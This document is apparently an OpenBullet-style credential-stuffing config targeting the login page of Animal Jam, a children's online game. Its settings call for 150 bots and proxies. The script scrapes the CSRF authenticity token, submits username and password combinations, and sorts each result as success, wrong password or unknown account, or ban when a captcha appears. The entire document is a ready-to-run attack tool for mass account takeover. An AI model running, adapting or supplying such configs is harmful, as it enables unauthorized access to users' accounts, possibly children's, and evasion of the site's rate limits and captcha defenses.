[SETTINGS]
{
  "Name": "Animaljam",
  "SuggestedBots": 150,
  "LastModified": "2019-04-13T12:20:22.7149111+02:00",
  "AdditionalInfo": "",
  "Author": "INFINITEY",
  "Version": "1.0.0",
  "IgnoreResponseErrors": false,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#GET_TOKEN REQUEST GET "https://www.animaljam.com/auth_login_ajax" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json, text/javascript, */*; q=0.01" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9,de;q=0.8" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Length: 243" 
  HEADER "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "Host: www.animaljam.com" 
  HEADER "Origin: https://www.animaljam.com" 
  HEADER "Referer: https://www.animaljam.com/" 
  HEADER "X-CSRF-Token: LcrfsKHLbwTqKrvGZiCMjqV6rUTWYz6VNoPiu2+DsIRAsK8Ed8q9tiCm20uBYv2GxbTaHYjMe9ANmyz3/dBebQ==" 
  HEADER "X-NewRelic-ID: VwcPV1NTGwEIXVhbBwc=" 
  HEADER "X-Requested-With: XMLHttpRequest" 
#TOKEN PARSE "<SOURCE>" LR "name=\"authenticity_token\" value=\"" "\" />" -> VAR "TOKEN" 
#LOGIN REQUEST POST "https://www.animaljam.com/auth_login_ajax" 
  CONTENT "utf8=%E2%9C%93&authenticity_token=<TOKEN>&signin_user%5Bscreen_name%5D=<USER>&signin_user%5Bpassword%5D=<PASS>&signin_user%5Bredemption_code%5D=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json, text/javascript, */*; q=0.01" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9,de;q=0.8" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Length: 243" 
  HEADER "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "Host: www.animaljam.com" 
  HEADER "Origin: https://www.animaljam.com" 
  HEADER "Referer: https://www.animaljam.com/" 
  HEADER "X-CSRF-Token: LcrfsKHLbwTqKrvGZiCMjqV6rUTWYz6VNoPiu2+DsIRAsK8Ed8q9tiCm20uBYv2GxbTaHYjMe9ANmyz3/dBebQ==" 
  HEADER "X-NewRelic-ID: VwcPV1NTGwEIXVhbBwc=" 
  HEADER "X-Requested-With: XMLHttpRequest" 
#CHECK KEYCHECK 
  KEYCHAIN Success OR 
    KEY "{\"good_to_go\":\"/game/play\"}" 
  KEYCHAIN Failure OR 
    KEY "{\"not_the_password\":\"The password you entered does not match our records.\",\"message\":\"The password you entered does not match our records.\"}" 
    KEY "{\"not_a_game_account\":\"I'm sorry, we cannot find an account matching that username.\",\"message\":\"I'm sorry, we cannot find an account matching that username.\"}" 
  KEYCHAIN Ban OR 
    KEY "{\"captcha_challenge" 
